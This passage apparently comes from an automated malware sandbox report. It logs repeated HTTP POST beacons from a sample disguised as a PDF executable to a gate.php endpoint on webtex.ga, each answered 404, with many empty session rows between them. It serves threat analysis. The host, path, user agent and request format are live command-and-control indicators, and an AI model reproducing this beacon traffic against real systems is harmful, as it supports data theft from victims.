                                    Dec 3, 2020 10:02:29.293359995 CET66OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 190
                                    Connection: close
                                    Dec 3, 2020 10:02:29.459626913 CET66INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:46 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 15
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    10192.168.2.34971947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:32.765127897 CET78OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:32.824419975 CET79INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:50 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    100192.168.2.34982247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    101192.168.2.34982347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    102192.168.2.34982547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    103192.168.2.34982647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    104192.168.2.34982847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    105192.168.2.34983047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    106192.168.2.34983247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    107192.168.2.34983447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    108192.168.2.34983647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    109192.168.2.34983847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    11192.168.2.34972047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:33.073391914 CET79OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:33.145654917 CET80INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:50 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    110192.168.2.34983947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    111192.168.2.34984147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    112192.168.2.34984247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    113192.168.2.34984447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    114192.168.2.34984547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    115192.168.2.34984647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    116192.168.2.34984847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    117192.168.2.34985047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    118192.168.2.34985147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    119192.168.2.34985247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    12192.168.2.34972147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:33.392092943 CET81OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:33.455180883 CET81INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:50 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    120192.168.2.34985347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    121192.168.2.34985447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    122192.168.2.34985547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    123192.168.2.34985647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    124192.168.2.34985747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    125192.168.2.34985847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    126192.168.2.34985947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    127192.168.2.34986047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    128192.168.2.34986147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    129192.168.2.34986247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    13192.168.2.34972247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:33.703087091 CET82OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:33.764564991 CET83INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:51 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    130192.168.2.34986447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    131192.168.2.34986547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    132192.168.2.34986647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    133192.168.2.34986747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    134192.168.2.34986847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    135192.168.2.34986947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    136192.168.2.34987047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    137192.168.2.34987147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    138192.168.2.34987247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    139192.168.2.34987347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    14192.168.2.34972347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:34.056226015 CET83OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:34.116974115 CET84INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:51 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    140192.168.2.34987447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    141192.168.2.34988047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    142192.168.2.34988147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    143192.168.2.34988247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    144192.168.2.34988347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    145192.168.2.34988447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    146192.168.2.34988547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    147192.168.2.34988647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    148192.168.2.34988747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    149192.168.2.34988847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    15192.168.2.34972447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:34.377229929 CET85OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:34.437256098 CET85INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:51 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    150192.168.2.34988947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    151192.168.2.34989047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    152192.168.2.34989147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    153192.168.2.34989247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    154192.168.2.34989347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    155192.168.2.34989447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    156192.168.2.34989547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    157192.168.2.34989647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    158192.168.2.34989747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    159192.168.2.34989847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    16192.168.2.34972547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:34.827049971 CET86OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:34.971106052 CET87INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:52 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    160192.168.2.34989947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    161192.168.2.34990047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    162192.168.2.34990147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    163192.168.2.34990247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    164192.168.2.34990347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    165192.168.2.34990447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    166192.168.2.34990547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    167192.168.2.34990647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    168192.168.2.34990747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    169192.168.2.34990847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    17192.168.2.34972647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:35.243072987 CET88OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:35.402596951 CET88INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:52 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    170192.168.2.34990947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    171192.168.2.34991047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    172192.168.2.34991147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    173192.168.2.34991247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    174192.168.2.34991347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    175192.168.2.34991447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    176192.168.2.34991547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    177192.168.2.34991647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    178192.168.2.34991747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    179192.168.2.34991847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    18192.168.2.34972747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:36.028625965 CET89OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:36.086844921 CET90INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:53 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    180192.168.2.34991947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    181192.168.2.34992047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    182192.168.2.34992147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    183192.168.2.34992247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    184192.168.2.34992347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    185192.168.2.34992447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    186192.168.2.34992547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    187192.168.2.34992647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    188192.168.2.34992747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    189192.168.2.34992847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    19192.168.2.34972847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:36.313062906 CET90OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:36.372262955 CET91INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:53 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
